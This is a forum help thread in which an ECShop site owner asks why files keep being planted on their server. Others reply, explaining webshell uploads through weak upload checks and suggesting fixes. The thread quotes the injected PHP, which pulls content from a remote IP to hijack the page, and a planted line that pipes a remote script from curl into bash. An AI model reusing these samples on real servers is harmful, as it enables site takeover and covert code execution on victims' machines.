20,359
社区成员
发帖
与我相关
我的任务
分享ecshop网站天天被人植入文件,谁知这是怎么样植入的?
近期我的ecshop网站天天被人植入文件,还更改首页代码。网站后台都已屏掉,还是被人上传文件到根目录下,文件内容打开如下:
谁知道:
1、植入的目的是什么?
2、用什么方法植入的?
3、有没有什么补助办法?
<?php
set_time_limit(0);
header("Content-Type: text/html;charset=gb2312");
$Rcaonidaye_vvcbbiB = "http://118.193.219.132/2265339750";
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];
$Content_mb=getHTTPPage($Rcaonidaye_vvcbbiB."/index.php?host=".$host_name);
function getHTTPPage($url) {
$opts = array(
'http'=>array(
'method'=>"GET",
'header'=>"User-Agent: aQ0O010O"
)
);
$context = stream_context_create($opts);
$html = @file_get_contents($url, false, $context);
if (empty($html)) {
exit("<p align='center'><font color='red'><b>Connection Error!</b></font></p>");
}
return $html;
}
echo $Content_mb;
?>
谁知道:
1、植入的目的是什么?
2、用什么方法植入的?
3、有没有什么补助办法?
<?php
set_time_limit(0);
header("Content-Type: text/html;charset=gb2312");
$Rcaonidaye_vvcbbiB = "http://118.193.219.132/2265339750";
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];
$Content_mb=getHTTPPage($Rcaonidaye_vvcbbiB."/index.php?host=".$host_name);
function getHTTPPage($url) {
$opts = array(
'http'=>array(
'method'=>"GET",
'header'=>"User-Agent: aQ0O010O"
)
);
$context = stream_context_create($opts);
$html = @file_get_contents($url, false, $context);
if (empty($html)) {
exit("<p align='center'><font color='red'><b>Connection Error!</b></font></p>");
}
return $html;
}
echo $Content_mb;
?>
...全文
请发表友善的回复…
发表回复
无涯大者 2019-07-08
- 打赏
- 举报
ecshop有一些版本会有漏洞,要及时修补更新。可以下载个 webD盾查杀下病毒。
websinesafe 2019-01-15
- 打赏
- 举报
一旦发现网站有挂马,泛解析,快照劫持,首页自动跳转等情况,检查看下网站的源代码,将非网站本身的代码去除,然后需要修复网站漏洞,不给黑客可乘之机;关于网站的漏洞修复,以及网站安全防护可以找专业的网站安全公司来处理,国内也就SINE安全,绿盟,启明星辰等安全公司比较专业,然后再修改网站相关的用户名与密码,找服务器安全公司加强服务器端的安全设置
chengyi_L 2018-11-07
- 打赏
- 举报
一些上传文件的接口在服务端并没有做到文件格式的验证。或者说文件格式的验证依赖于前端传参,这样很容易被破解的。
黑客应该是通过你文件上传插件的漏洞上传了php webshell脚本,从而得到你服务器控制权的。
一般做到 上传文件服务端校验一下文件格式 或者 文件上传目录禁止执行php脚本可预防
sinat_35033848 2018-11-03
- 打赏
- 举报
1、植入的目的是什么? 多种用途, 篡改主页,劫持流量,挂黑链,服务器挖矿
2、用什么方法植入的? 如果是正版的,那么一般是找到后门,破解后台帐号密码,登录上传木马,或者官方版本有上传权限的漏洞,直接绕过,找到后台的上传文件地址,直接上传
3、有没有什么补助办法? 如果是正版的ecshop,那么备份下数据库和模版,整个服务器重装,再重新下载官方的版本,还原网站,然后修改后台登录地址,或者不使用的时候直接把后台登录的整个文件夹移动到../里,要用的时候再移动到/wwwroot中
<?php $handle = popen("curl -s http://192.99.142.246:8220/mr.sh | bash -sh","r");?>;
这段是linux里面下载mr.sh文件,这个是一个脚本,里面具体的脚本好像是下载一个sustse的东西,具体不清楚
2、用什么方法植入的? 如果是正版的,那么一般是找到后门,破解后台帐号密码,登录上传木马,或者官方版本有上传权限的漏洞,直接绕过,找到后台的上传文件地址,直接上传
3、有没有什么补助办法? 如果是正版的ecshop,那么备份下数据库和模版,整个服务器重装,再重新下载官方的版本,还原网站,然后修改后台登录地址,或者不使用的时候直接把后台登录的整个文件夹移动到../里,要用的时候再移动到/wwwroot中
<?php $handle = popen("curl -s http://192.99.142.246:8220/mr.sh | bash -sh","r");?>;
这段是linux里面下载mr.sh文件,这个是一个脚本,里面具体的脚本好像是下载一个sustse的东西,具体不清楚
smwhotjay 2018-10-23
- 打赏
- 举报
开源的东西,你用,别人研究源码找你漏洞。搞掂你的站。
masmallcn 2018-10-22
- 打赏
- 举报
还有这段是什么意思?<?php $handle = popen("curl -s http://192.99.142.246:8220/mr.sh | bash -sh","r");?>;
masmallcn 2018-10-22
- 打赏
- 举报
刚百度查118.193.219.132 是香港特别行政区的IP。。
xuzuning 2018-10-22
- 打赏
- 举报
主页文件被恶意修改,应该是服务器遭到的攻击!请联系网管进行处理
http://118.193.219.132/2265339750 是 中国新闻网 的链接。请向 工信部 投诉(不然要备案做什么?)和向 公安部门 报案
http://118.193.219.132/2265339750 是 中国新闻网 的链接。请向 工信部 投诉(不然要备案做什么?)和向 公安部门 报案
qq_34494805 2018-10-22
- 打赏
- 举报
curl -s http://192.99.142.246:8220/mr.sh
在你的服务器上面执行mr.sh 脚本。里面可以是删库或者拷贝,或者删除文件的命令
不要随便装非官方出品的插件或模板,
https://pjax.cn/post/30
看看这个 这样的人渣,做开发还留后门,人品真没谁了。
PHP本来就是开源的,加密也无济于事,怕别人破解 就别用PHP
更何况前端的东西随随便便都可以模仿的。复制的,
